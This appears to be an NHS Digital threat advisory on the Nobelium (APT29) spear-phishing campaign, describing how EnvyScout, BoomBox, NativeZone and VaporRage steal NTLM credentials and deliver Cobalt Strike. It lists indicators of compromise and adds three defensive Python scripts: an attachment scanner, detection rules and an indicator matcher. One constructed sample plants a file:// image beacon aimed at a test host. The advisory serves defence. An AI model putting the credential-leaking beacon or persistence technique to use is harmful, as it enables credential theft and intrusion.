
Nobelium Advanced Spear-Phishing Campaign

Nobelium, also known as APT29, are conducting a sophisticated spear-phishing campaign against government and non-government organisations throughout the West. Their goal appears to be the delivery of four separate malware families: EnvyScout, BoomBox, NativeZone, and VaporRage.




Affected platforms

The following platforms are known to be affected:

Threat details

Introduction

A new campaign by the Nobelium advanced persistent threat group has been identified. Beginning in February this year, the group appear to be targeting western government agencies as well as human rights and international development organisations with spear-phishing attacks to deliver four separate payloads: EnvyScout, BoomBox, NativeZone, and VaporRage.


Delivery

Nobelium has used several distinct waves of spear-phishing attacks during this campaign, adjusting them as their objectives change.

The first wave seen in early February contained a link to a Google Firebase page staging an ISO file. This wave appears to have been used solely to profile targets using Firebase’s inbuilt metrics.

The next wave then used an HTML attachment, EnvyScout, to deliver the ISO file whilst still using Firebase for target tracking. Several variations of this wave were seen, including one that embedded the ISO within the HTML file, while another redirected the attachment to an RTF document with an embedded Dynamic-Link Library (DLL) file. Another variant directed users to a Nobelium-controlled website where the ISO file would be dropped.

In April 2021, Nobelium appeared to refine their approach, focusing on EnvyScout delivering an embedded ISO file, and dropping Firebase in favour of a target-tracking mechanism built into EnvyScout. Following this change, they began using a legitimate mass-mailing service to deliver emails to more than 150 target organisations.

EnvyScout

EnvyScout is a dropper distributed as a malicious HTML/JS attachment. On opening, EnvyScout loads an image from a file:// URL in an attempt to prompt the affected system into sending the user’s NTLM credentials to a remote site. This suggests Nobelium is operating a credential-capturing service and could use brute-force attacks against captured credentials to recover the user’s password for later use. A second URL loads an image from a remote server, confirming to Nobelium that the target has opened the attachment.

EnvyScout contains an embedded ISO file which it writes to disk on the user’s machine. Before writing the ISO file to disk, EnvyScout may perform additional checks on the host system. Some variants check window.location.pathname in JavaScript to confirm that the file is being executed from the C: drive, terminating if not. Other variants check the browser environment, using user-agent information to determine the host operating system (OS) and redirecting the user to an external site if iOS is detected.

When the user opens the ISO file, Windows mounts it as a drive, assigning it an available drive letter. The mounted ISO contains:

  • A hidden file named boom.exe
  • A hidden folder containing a decoy PDF document
  • A visible LNK shortcut used to launch boom.exe
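The traits described above (an image fetched from a file:// URL, a remote tracking image, a blob-saving API call and a large base64 literal that decodes to an ISO 9660 image) can be checked statically before an HTML attachment ever reaches a browser. The following triage script is an added example written for this page, not NHS Digital or Microsoft code; the sample attachment it builds, the hosts in it and the 4096-character size threshold are constructed assumptions, and the embedded "ISO" is just a zero-filled buffer carrying the CD001 signature.

```python
"""Static triage of an HTML attachment for EnvyScout-style traits (added example)."""
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

ISO_SIG_OFFSET = 0x8001   # ISO 9660 primary volume descriptor: "CD001" at byte 32769
MIN_BLOB_CHARS = 4096     # assumption: shorter base64 literals are usually fonts or icons
B64_LITERAL = re.compile(r'["\']([A-Za-z0-9+/]{%d,}={0,2})["\']' % MIN_BLOB_CHARS)
SAVE_APIS = ("msSaveOrOpenBlob", "msSaveBlob", "createObjectURL")


class _Collector(HTMLParser):
    """Collects <img src> values and inline <script> bodies."""
    def __init__(self):
        super().__init__()
        self.img_srcs, self.script_chunks, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.img_srcs += [v for k, v in attrs if k == "src" and v]
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_chunks.append(data)


def triage_html(html_text):
    """Return the EnvyScout-style traits found in one HTML document."""
    p = _Collector()
    p.feed(html_text)
    p.close()
    findings = {"file_url_images": [], "remote_images": [], "blob_save_api": False, "embedded_iso": False}
    for src in p.img_srcs:
        scheme = urlparse(src).scheme.lower()
        if scheme == "file":                       # NTLM-leak / open-tracking beacon
            findings["file_url_images"].append(src)
        elif scheme in ("http", "https"):          # plain open-tracking beacon
            findings["remote_images"].append(src)
    js = "".join(p.script_chunks)                  # join chunks so a split literal still matches
    findings["blob_save_api"] = any(api in js for api in SAVE_APIS)
    for m in B64_LITERAL.finditer(js):
        try:
            raw = base64.b64decode(m.group(1), validate=True)
        except ValueError:
            continue
        if raw[ISO_SIG_OFFSET:ISO_SIG_OFFSET + 5] == b"CD001":
            findings["embedded_iso"] = True
    return findings


def risk_score(findings):
    """Number of traits present; file:// image plus embedded ISO is the full pattern."""
    return sum([bool(findings["file_url_images"]), bool(findings["remote_images"]),
                findings["blob_save_api"], findings["embedded_iso"]])


def build_sample_attachment():
    """Constructed HTML showing the traits; the blob is a zero-filled ISO header, not a payload."""
    fake_iso = b"\0" * ISO_SIG_OFFSET + b"CD001" + b"\0" * 64
    blob = base64.b64encode(fake_iso).decode()
    return (
        '<html><body>'
        '<img src="file://203.0.113.10/share/logo.png">'       # constructed TEST-NET host
        '<img src="https://tracker.invalid/open.gif">'         # constructed .invalid host
        '<script>var d = "%s"; /* would be saved via navigator.msSaveOrOpenBlob */</script>'
        '</body></html>' % blob)


if __name__ == "__main__":
    f = triage_html(build_sample_attachment())
    print(f, "score", risk_score(f))
```

The file:// check is the one worth keeping even if everything else is tuned out: a legitimate mail attachment has no reason to reference an SMB path, and the parser reports the exact URL so the host can be blocked at the perimeter while the message is investigated.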

BoomBox

BoomBox is a malicious downloader launched when the user clicks on the LNK file contained in the mounted ISO. It downloads two encrypted malware files from Dropbox: NativeZone and VaporRage. If the download is successful, it gathers user and system information to enumerate the user’s computer. After downloading and decrypting the two files, BoomBox drops a PDF file named NV.pdf in a directory on the mounted ISO. It then creates a Run registry value named MicroNativeCacheSvc to establish persistence, so that NativeZone launches automatically whenever a user logs into Windows.

The final step involves BoomBox executing an LDAP query if the system is domain-joined. This will gather data including the SAM account name, email, and display name of all domain users. Following this, BoomBox uploads this data to a dedicated system folder in Dropbox. BoomBox uses a set of regular expressions to ensure that the file has been successfully uploaded to Dropbox.

NativeZone

NativeZone is a custom Cobalt Strike loader module used to decode and deploy Cobalt Strike Beacon modules, in this case VaporRage. Like older Nobelium loaders such as Teardrop and Raindrop, certain NativeZone variants have anti-analysis functionality.

VaporRage

VaporRage is a Cobalt Strike Beacon payload that is used as a shellcode downloader. It first ensures that NativeZone is present on the system before registering itself as a compromised system to a Nobelium-controlled website and downloading an XOR-encoded shellcode blob. This blob is then decoded and executed in memory.

VaporRage will continue to look for blobs, including Cobalt Strike stage shellcode, approximately once an hour until it is unloaded from memory.
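The BoomBox, NativeZone and VaporRage behaviours described in the three sections above each leave a host-level trace: a process started from the root of a freshly mounted drive, a Run value named MicroNativeCacheSvc (or Run data pointing at NativeCacheSvc.dll from the indicator list below), Dropbox API traffic from a process that is not the Dropbox client, and a connection that repeats roughly once an hour. The rules below are an added example written for this page, not NHS Digital or Microsoft detection content; they use the field names of Sysmon ProcessCreate (1), NetworkConnect (3) and RegistryEvent (13), and every event, path, SID, timestamp and the 300-second beacon tolerance is constructed or assumed.

```python
"""Detection rules for the BoomBox / NativeZone / VaporRage chain over Sysmon-style events (added example)."""
from collections import defaultdict
from datetime import datetime, timezone
import ntpath

RUN_KEY_FRAGMENT = "\\currentversion\\run\\"
PERSISTENCE_VALUE = "micronativecachesvc"         # Run value name given on the page
LOADER_DLL = "nativecachesvc.dll"                 # NativeZone filename from the IoC list
BEACON_PERIOD_S, BEACON_TOLERANCE_S = 3600, 300   # "approximately once an hour"; tolerance is an assumption


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)


def iso_launch(ev):
    """ProcessCreate: boom.exe by name, or explorer.exe starting something from the root of a
    non-system drive, which is what a user opening the LNK in a mounted ISO looks like."""
    if ev.get("EventID") != 1:
        return None
    image, parent = ev.get("Image", ""), ev.get("ParentImage", "")
    drive, rest = ntpath.splitdrive(image)
    if ntpath.basename(image).lower() == "boom.exe":
        return "boombox_filename"
    if drive.upper() != "C:" and rest.count("\\") == 1 and ntpath.basename(parent).lower() == "explorer.exe":
        return "explorer_launch_from_drive_root"
    return None


def run_key_persistence(ev):
    """RegistryEvent: a Run value named MicroNativeCacheSvc, or Run data naming NativeCacheSvc.dll."""
    if ev.get("EventID") != 13:
        return None
    target, details = ev.get("TargetObject", "").lower(), ev.get("Details", "").lower()
    if RUN_KEY_FRAGMENT in target and (target.endswith(PERSISTENCE_VALUE) or LOADER_DLL in details):
        return "nativezone_run_key"
    return None


def dropbox_from_unexpected_process(ev):
    """NetworkConnect to the Dropbox API from anything but the Dropbox client (assumption: only the
    official client is expected to use that API on managed hosts)."""
    if ev.get("EventID") != 3:
        return None
    host = ev.get("DestinationHostname", "").lower()
    image = ntpath.basename(ev.get("Image", "")).lower()
    if host.endswith("dropboxapi.com") and image != "dropbox.exe":
        return "dropbox_api_from_unexpected_process"
    return None


def hourly_beacons(events):
    """(Image, host) pairs whose connections recur about once an hour, three or more times."""
    buckets = defaultdict(list)
    for ev in events:
        if ev.get("EventID") == 3:
            buckets[(ev["Image"], ev["DestinationHostname"])].append(_ts(ev["UtcTime"]))
    hits = []
    for key, times in buckets.items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if len(gaps) >= 2 and all(abs(g - BEACON_PERIOD_S) <= BEACON_TOLERANCE_S for g in gaps):
            hits.append(key)
    return hits


def analyse(events):
    """Return (event index or None for the periodic rule, rule name) for every rule that fires."""
    alerts = []
    for i, ev in enumerate(events):
        for rule in (iso_launch, run_key_persistence, dropbox_from_unexpected_process):
            name = rule(ev)
            if name:
                alerts.append((i, name))
    for image, host in hourly_beacons(events):
        alerts.append((None, "hourly_beacon:%s->%s" % (ntpath.basename(image), host)))
    return alerts


# Constructed events: the SID, user name, times and client install path are made up.
SAMPLE_EVENTS = [
    {"EventID": 1, "UtcTime": "2021-05-25 09:00:00", "Image": r"E:\boom.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 3, "UtcTime": "2021-05-25 09:00:05", "Image": r"E:\boom.exe",
     "DestinationHostname": "api.dropboxapi.com"},
    {"EventID": 13, "UtcTime": "2021-05-25 09:00:07", "Image": r"E:\boom.exe",
     "TargetObject": r"HKU\S-1-5-21-0-0-0-1001\Software\Microsoft\Windows\CurrentVersion\Run\MicroNativeCacheSvc",
     "Details": r"rundll32.exe C:\Users\alice\AppData\Local\NativeCacheSvc.dll"},
    {"EventID": 3, "UtcTime": "2021-05-25 09:30:00", "Image": r"C:\Program Files\Dropbox\Client\Dropbox.exe",
     "DestinationHostname": "api.dropboxapi.com"},
] + [
    {"EventID": 3, "UtcTime": t, "Image": r"C:\Windows\System32\rundll32.exe",
     "DestinationHostname": "holescontracting.com"}
    for t in ("2021-05-25 10:00:00", "2021-05-25 11:01:10", "2021-05-25 12:00:30", "2021-05-25 13:02:00")
]

if __name__ == "__main__":
    for alert in analyse(SAMPLE_EVENTS):
        print(alert)
```

The periodic rule is deliberately tolerant: VaporRage is described as checking roughly hourly, so a window of a few minutes either side is needed, and the rule requires at least three connections before it fires so that two coincidental requests do not raise an alert.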


Remediation advice

To prevent and detect an infection, NHS Digital advises that:

  • Secure configurations are applied to all devices.
  • Security updates are applied at the earliest opportunity.
  • Tamper protection settings in security products are enabled where available.
  • Obsolete platforms are segregated from the rest of the network.
  • IT usage policies are reinforced by regular training to ensure all users know not to open unsolicited links or attachments.
  • Multi-factor authentication (MFA) and lockout policies are used where practicable, especially for administrative accounts.
  • Administrative accounts are only used for necessary purposes.
  • Remote administration services use strongly encrypted protocols and only accept connections from authorised users or locations.
  • Systems are continuously monitored, and unusual activity is investigated, so that a compromise of the network can be detected as early as possible.

Please note that NCSC maintains guidance for securely configuring a wide range of end user device (EUD) platforms. For further details refer to their end user device security guidance pages.


Indicators of compromise

EnvyScout

Domains

  • eventbrite-com-default-rtdb[.]firebaseio[.]com
  • humanitarian-forum-default-rtdb[.]firebaseio[.]com
  • security-updater-default-rtdb[.]firebaseio[.]com

SHA256 hashes

  • 065e9471fb4425ec0b3a2fd15e1546d66002caca844866b0764cbf837c21a72a
  • 279d5ef8f80aba530aaac8afd049fa171704fc703d9cfe337b56639732e8ce11
  • 2836e5553e1ae52a1591545b362d1a630e3fef7e6b7e8342a84008fe4a6473a9
  • 6df1d7191f6dd930642cc5c599efb54bfcc964b7a2e77f6007787de472b22a6a
  • 9059c5b46dce8595fcc46e63e4ffbceeed883b7b1c9a2313f7208a7f26a0c186
  • 9301e48ea3fa7d39df871f04072ee47b9046d76aa378a1c5697f3b2c14aef1d6
  • ca83d7456a49dc5b8fe71007e5ac590842b146dd5c45c9a65fe57e428a8bd7c6
  • cfb57906cf9c5e9c91bc4aa065f7997b1b32b88ff76f253a73ee7f6cfd8fff2f
  • f5bc4a9ffc2d33d4f915e41090af71544d84b651fb2444ac91f6e56c1f2c70d5
  • f7e8c9d19efd71f5c8217bf12bdd3f6c88d5f56ab65fea02dc2777c5402a18f1

Filenames

  • attachment.html
  • Attachment.html
  • information.html
  • Invitation.html
  • NV.html
  • nv.html
  • Reply slip.html

BoomBox

SHA256 hashes

  • 0acb884f2f4cfa75b726cb8290b20328c8ddbcd49f95a1d761b7d131b95bafec
  • 8199f309478e8ed3f03f75e7574a3e9bce09b4423bd7eb08bb5bff03af2b7c27
  • cf1d992f776421f72eabc31d5afc2f2067ae856f1c9c1d6dc643a67cb9349d8c

Filenames

  • boom.exe

NativeZone

Domains

  • cdn[.]theyardservice[.]com
  • dataplane[.]theyardservice[.]com
  • doggroomingnews[.]com
  • static[.]theyardservice[.]com
  • worldhomeoutlet[.]com

SHA256 hashes

  • 136f4083b67bc8dc999eb15bb83042aeb01791fc0b20b5683af6b4ddcf0bbc7d
  • 3b94cc71c325f9068105b9e7d5c9667b1de2bde85b7abc5b29ff649fd54715c4
  • 4fbfeb7a0bb6b9841b92fa4e6b5a7bdb69c2a12ed39691c9495ff88cd6f58836
  • 656384c4e5f9fe435d51edf910e7ba28b5c6d183587cf3e8f75fb2d798a01eeb
  • b295c5ad4963bdffa764b93421c3dd512ca6733b79bdff2b99510e7d56a70935
  • ee42ddacbd202008bcc1312e548e1d9ac670dd3d86c999606a3a01d464a2a330

Filenames

  • documents.dll
  • KM.FileSystem.dll
  • manual.pdf
  • NativeCacheSvc.dll (NativeZone)
  • Wbtr.dll

VaporRage

Domains

  • holescontracting[.]com
  • newsplacec[.]com

SHA256 hashes

  • 117317d623003995d639975774edd1bfe38cec7d24b22d3e48d22c91cf8636bb
  • 1c17c39af41a5d8f54441ce6b1cf925f6727a2ee9038284a8a7071c984d0460f
  • 23e20d630a8fd12600c2811d8f179f0e408dcb3e82600456db74cbf93a66e70f
  • b0bfe6a8aa031f7f5972524473f3e404f85520a7553662aaf886055007a57db5

Filenames

  • CertPKIProvider.dll (VaporRage)
  • mswsc.dll
  • readme.pdf

Network indicators

Domains, IP addresses and URLs

  • 139[.]99[.]167[.]177
  • 185[.]158[.]250[.]239
  • 195[.]206[.]181[.]169
  • 37[.]120[.]247[.]135
  • 45[.]135[.]167[.]27
  • 51[.]254[.]241[.]158
  • 51[.]38[.]85[.]225
  • 74d6b7b2[.]app[.]giftbox4u[.]com
  • aimsecurity[.]net
  • cdn[.]theyardservice[.]com
  • cdnappservice[.]firebaseio[.]com
  • cdnappservice[.]web[.]app
  • cityloss[.]com
  • content[.]pcmsar[.]net
  • cross-checking[.]com
  • dailydews[.]com
  • dataplane[.]theyardservice[.]com
  • doggroomingnews[.]com
  • email[.]theyardservice[.]com
  • emergencystreet[.]com
  • enpport[.]com
  • eventbrite-com-default-rtdb[.]firebaseio[.]com
  • financialmarket[.]org
  • giftbox4u[.]com
  • hanproud[.]com
  • holescontracting[.]com
  • https://r20[.]rs6[.]net/tn[.]jsp?<unique_to_target>
  • humanitarian-forum[.]web[.]app
  • humanitarian-forum-default-rtdb[.]firebaseio[.]com
  • logicworkservice[.]web[.]app
  • newsplacec[.]com
  • newstepsco[.]com
  • pcmsar[.]net
  • security-updater[.]web[.]app
  • security-updater-default-rtdb[.]firebaseio[.]com
  • smtp2[.]theyardservice[.]com
  • static[.]theyardservice[.]com
  • stockmarketon[.]com
  • stsnews[.]com
  • supportcdn[.]web[.]app
  • supportcdn-default-rtdb[.]firebaseio[.]com
  • tacomanewspaper[.]com
  • techiefly[.]com
  • theadminforum[.]com
  • theyardservice[.]com
  • trendignews[.]com
  • usaid[.]theyardservice[.]com
  • worldhomeoutlet[.]com

Host indicators

SHA256 hashes

  • 0c14a791f8a48d2944a9fa842f45becb7309ad004695e38f48fca69135d327c6
  • 112f92cfecdc4e177458bc1caebcc4420b5879840f137f249fac360ddac64ddd
  • 1f5a915e75ad96e560cee3e24861cf6f8de299fdf79e1829453defbfe2013239
  • 2523f94bd4fba4af76f4411fe61084a7e7d80dec163c9ccba9226c80b8b31252
  • 292e5b0a12fea4ff3fc02e1f98b7a370f88152ce71fe62670dd2f5edfaab2ff8
  • 2a352380d61e89c89f03f4008044241a38751284995d000c73acf9cad38b989e
  • 2ebbb99b8dae0c7b0931190fa81add987b44d4435dafcf53a9cde0f19bb91398
  • 574b7a80d8b9791cb74608bc4a9fcba4e4574fafef8e57bdee340728445ebd16
  • 5f7d08eb2039a9d2e99ebf3d0ef2796b93d0a01e9b8ec403fec8fcdf46448693
  • 60e20576b08a24cdaeaabc4849011885fb7517713226e2663031d9533d2187bc
  • 6e2069758228e8d69f8c0a82a88ca7433a0a71076c9b1cb0d4646ba8236edf23
  • 73ca0485f2c2c8ba95e00188de7f5509304e1c1eb20ed3a238b0aa9674f9104e
  • 749bf48a22ca161d86b6e36e71a6817b478a99d935cd721e8bf3dba716224c84
  • 776014a63bf3cc7034bd5b6a9c36c75a930b59182fe232535bb7a305e539967b
  • 7a3b27cf04b7f8110fc1eee5f9c4830d38ac00467fc856330115af4bffaf35b6
  • 7bf3457087ea91164f86f4bb50ddb46c469c464c300228dba793f7bfe608c83e
  • 7d34f25ad8099bd069c5a04799299f17d127a3866b77ee34ffb59cfd36e29673
  • 7ed1b6753c94250ad3c1c675eb644940c8104ff06a123252173c33cc1be5e434
  • 873717ea2ea01ae6cd2c2dca9d6f832a316a6e0370071bb4ee6ecff3163f8d18
  • 88c95954800827cb68e1efdacd99093f7f9646d82613039472b5c90e5978444d
  • 89016b87e97a07b4e0263a18827defdeaa3e150b1523534bbdebe7305beabb64
  • 94786066a64c0eb260a28a2959fcd31d63d175ade8b05ae682d3f6f9b2a5a916
  • 98473e1b8f7bedd5cfa3b83dad611db48eee23faec452e62797fb7752228c759
  • a45a77ad5c138a149aa71fb323a1e2513e7ac416be263d1783a7db380d06d2fc
  • a4f1f09a2b9bc87de90891da6c0fca28e2f88fd67034648060cef9862af9a3bf
  • bca5560a9a9dd54be76e4a8d63a66e9cfd731b0bd28524db05cc498bb5b56384
  • c4ff632696ec6e406388e1d42421b3cd3b5f79dcb2df67e2022d961d5f5a9e78
  • ca66b671a75bbee69a4a4d3000b45d5dc7d3891c7ee5891272ccb2c5aed5746c
  • d19ff098fe0f5947e08ec23be27d3a3355e14fb20135d8c4145126caa8be4b05
  • d37347f47bb8c7831ae9bb902ed27a6ce85ddd9ba6dd1e963542fd63047b829c
  • dcf48223af8bb423a0b6d4a366163b9308e9102764f0e188318a53f18d6abd25
  • e41a7616a3919d883beb1527026281d66e7bcdaff99600e462d36a58f1bdc794
  • f006af714379fdd63923536d908f916f4c55480f3d07adadd53d5807e0c285ee
  • f9a74ac540a6584fc3ba7ccc172f948c6b716cceea313ce1d9e7b735fa2a5687

Filenames

  • AktualizC!ciu.img
  • Attachment.img
  • attachment.img
  • attachment.iso
  • cert.html
  • desktop.dll
  • diassvcs.dll
  • dppy_empty.iso
  • dxgim.dll
  • GraphicalComponent.dll
  • ica-declass.img
  • ICA-declass.iso
  • ica-declass.pdf
  • imgmountingservice.dll
  • information.exe
  • information.iso
  • Invitation Document.iso
  • Java_SRE_runtime_update.dll
  • Meeting info.docx
  • msch.dll
  • msdiskmountservice.dll
  • mshost.dll
  • mstu.dll
  • nv.img
  • NV.img
  • nv.pdf
  • Reply slip.iso
  • reply slip.rtf
  • Reply slip.rtf
  • ScanClientUpdate.zip
  • SMM_Report.img
  • state ellection changes.docx
  • topics_of_discussion.iso
  • WRAR600.EX
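The indicator lists above are defanged with [.] and contain a few repeated entries, so before they can be loaded into a proxy or EDR search they need refanging, classifying and deduplicating. The script below is an added example written for this page and is not NHS Digital tooling; the indicators in PAGE_INDICATORS are copied from the lists above (including two of the repeats, to show the dedup), while the proxy log layout, the log lines and the file inventory are constructed for the demonstration. Parent-domain matching is used deliberately, so that an entry such as theyardservice[.]com also catches its subdomains, while a look-alike such as notholescontracting.com is not matched.

```python
"""Refang, classify and match the page's defanged indicators against constructed logs (added example)."""
import ipaddress
import re

SHA256_RE = re.compile(r"^[0-9a-f]{64}$")

# Copied from the indicator lists on this page; duplicates kept on purpose to show the dedup.
PAGE_INDICATORS = """
eventbrite-com-default-rtdb[.]firebaseio[.]com
eventbrite-com-default-rtdb[.]firebaseio[.]com
45[.]135[.]167[.]27
theyardservice[.]com
usaid[.]theyardservice[.]com
holescontracting[.]com
https://r20[.]rs6[.]net/tn[.]jsp?<unique_to_target>
0acb884f2f4cfa75b726cb8290b20328c8ddbcd49f95a1d761b7d131b95bafec
60e20576b08a24cdaeaabc4849011885fb7517713226e2663031d9533d2187bc
60e20576b08a24cdaeaabc4849011885fb7517713226e2663031d9533d2187bc
"""


def refang(s):
    """Undo the [.] and hxxp defanging used in published indicator lists."""
    return s.strip().replace("[.]", ".").replace("hxxp", "http")


def classify(ioc):
    """One of 'sha256', 'url', 'ipv4' or 'domain'."""
    if SHA256_RE.match(ioc):
        return "sha256"
    if "://" in ioc:
        return "url"
    try:
        ipaddress.IPv4Address(ioc)
        return "ipv4"
    except ValueError:
        return "domain"


def load_indicators(text):
    """Return ({kind: set of refanged, lower-cased indicators}, [duplicates dropped])."""
    kinds = {"sha256": set(), "ipv4": set(), "url": set(), "domain": set()}
    seen, dupes = set(), []
    for raw in text.splitlines():
        if not raw.strip():
            continue
        ioc = refang(raw).lower()
        if ioc in seen:
            dupes.append(ioc)
            continue
        seen.add(ioc)
        kinds[classify(ioc)].add(ioc)
    return kinds, dupes


def domain_hit(host, domains):
    """Exact match or any parent domain in the set; the bare TLD is never tested."""
    labels = host.lower().rstrip(".").split(".")
    return any(".".join(labels[i:]) in domains for i in range(len(labels) - 1))


def scan_proxy_log(lines, kinds):
    """Lines are '<timestamp> <action> <client> <destination host>' (a constructed layout)."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 4:
            continue
        ts, client, dest = parts[0], parts[2], parts[3]
        if dest in kinds["ipv4"] or domain_hit(dest, kinds["domain"]):
            hits.append((ts, client, dest))
    return hits


def scan_hashes(inventory, kinds):
    """inventory maps file path -> SHA256, as an EDR file-inventory export might."""
    return sorted((path, h) for path, h in inventory.items() if h.lower() in kinds["sha256"])


SAMPLE_PROXY_LOG = [   # constructed
    "2021-05-27T10:02:11Z ALLOW 10.0.0.5 cdn.theyardservice.com",
    "2021-05-27T10:02:12Z ALLOW 10.0.0.5 www.example.org",
    "2021-05-27T10:05:40Z ALLOW 10.0.0.7 45.135.167.27",
    "2021-05-27T10:06:01Z ALLOW 10.0.0.9 notholescontracting.com",
]
SAMPLE_INVENTORY = {   # constructed paths; the first hash is the page's BoomBox hash, upper-cased
    r"C:\Users\alice\Downloads\boom.exe": "0ACB884F2F4CFA75B726CB8290B20328C8DDBCD49F95A1D761B7D131B95BAFEC",
    r"C:\Windows\notepad.exe": "0" * 64,
}

if __name__ == "__main__":
    kinds, dupes = load_indicators(PAGE_INDICATORS)
    print("dropped duplicates:", dupes)
    print("proxy hits:", scan_proxy_log(SAMPLE_PROXY_LOG, kinds))
    print("hash hits:", scan_hashes(SAMPLE_INVENTORY, kinds))
```

The one entry that cannot be matched literally is the r20[.]rs6[.]net URL, whose query string is unique per target; it is kept as a 'url' indicator so that a search can be run on the host and path prefix rather than the full string.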

Last edited: 4 June 2021 1:05 pm